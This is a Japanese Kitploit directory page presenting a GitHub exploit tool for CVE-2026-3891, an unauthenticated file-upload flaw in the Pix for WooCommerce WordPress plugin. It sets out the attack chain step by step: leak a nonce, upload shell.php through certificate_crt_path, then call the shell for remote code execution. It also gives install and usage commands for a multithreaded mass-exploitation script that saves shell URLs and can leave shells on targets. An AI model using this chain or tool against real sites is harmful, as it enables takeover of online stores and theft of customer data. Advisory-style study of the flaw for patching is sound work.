Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-3891 — Pix for WooCommerce の certificate_crt_path パラメータを介した未認証ファイルアップロード | CVSS 9.8 | Kitploit
ツール/GitHubGitHub/shinthink/cve-2026-3891
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育
GitHubshinthink/cve-2026-3891

CVE-2026-3891

Pix for WooCommerce の certificate_crt_path パラメータを介した未認証ファイルアップロード | CVSS 9.8

リポジトリを見る
4121ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-3891 — Pix for WooCommerce 認証なしファイルアップロード RCE

Nonce リーク → certificate_crt_path アップロード → コード実行


概要

CVE-2026-3891 は、Pix for WooCommerce WordPress プラグイン(linknacional 製)バージョン ≤ 1.5.0 における、CVSS 9.8 の重大度を持つ認証なしの任意ファイルアップロード脆弱性です。

lkn_pix_for_woocommerce_c6_save_settings AJAX ハンドラーには、以下の問題があります:

  1. 権限チェックなし — 認証されていない訪問者でも呼び出せる
  2. ファイルタイプの検証なし — certificate_crt_path パラメータで任意の拡張子が受け入れられる
  3. 有効な nonce は lkn_pix_for_woocommerce_generate_nonce エンドポイントから認証なしで自由に取得可能

アップロードされたファイルは、Web アクセス可能なディレクトリ /wp-content/plugins/payment-gateway-pix-for-woocommerce/Includes/files/certs_c6/ に保存されます。

影響を受けるバージョン

バージョンステータス
≤ 1.5.0脆弱
1.6.0+修正済み

発見者: Alexis Lafontaine(Wordfence 経由、2026年3月13日)


脆弱性のメカニズム

根本原因

root@kitploit:~
// Nonce generated without auth
add_action('wp_ajax_nopriv_lkn_pix_for_woocommerce_generate_nonce', ...);

// Upload handler — no capability check, no file type validation
add_action('wp_ajax_nopriv_lkn_pix_for_woocommerce_c6_save_settings', ...);
function c6_save_settings() {
    // No current_user_can() check
    // No wp_check_filetype() call
    move_uploaded_file($_FILES['certificate_crt_path']['tmp_name'], $dest);
}

攻撃の流れ

root@kitploit:~
1. POST /wp-admin/admin-ajax.php?action=lkn_pix_for_woocommerce_generate_nonce
   → Get valid nonce (no auth needed)
2. POST /wp-admin/admin-ajax.php?action=lkn_pix_for_woocommerce_c6_save_settings
   → Upload shell.php via certificate_crt_path field
3. GET /wp-content/plugins/payment-gateway-pix-for-woocommerce/Includes/files/certs_c6/shell.php
   → RCE

インストール

root@kitploit:~
git clone https://github.com/shinthink/CVE-2026-3891.git
cd CVE-2026-3891
pip install -r requirements.txt

使用方法

root@kitploit:~
python cve_2026_3891.py -t target.com
python cve_2026_3891.py -f targets.txt -o shells.txt
python cve_2026_3891.py -t target.com --debug --no-cleanup

引数

root@kitploit:~
  -t, --target      Single target
  -f, --file        Target list
  -o, --output      Save RCE URLs
  --threads         Workers (default: 30)
  --no-cleanup      Leave shells on target
  --debug           Show every request
  -v, --verbose     Verbose output

免責事項

教育目的および許可されたテスト目的のみに使用してください。 著者らは誤用に対するいかなる責任も負いません。


参考情報

リソースリンク
Wordfence アドバイザリwordfence.com
NVD エントリCVE-2026-3891
研究者Alexis Lafontaine

linknacional または Pix for WooCommerce とは提携関係にありません。

ツールをダウンロード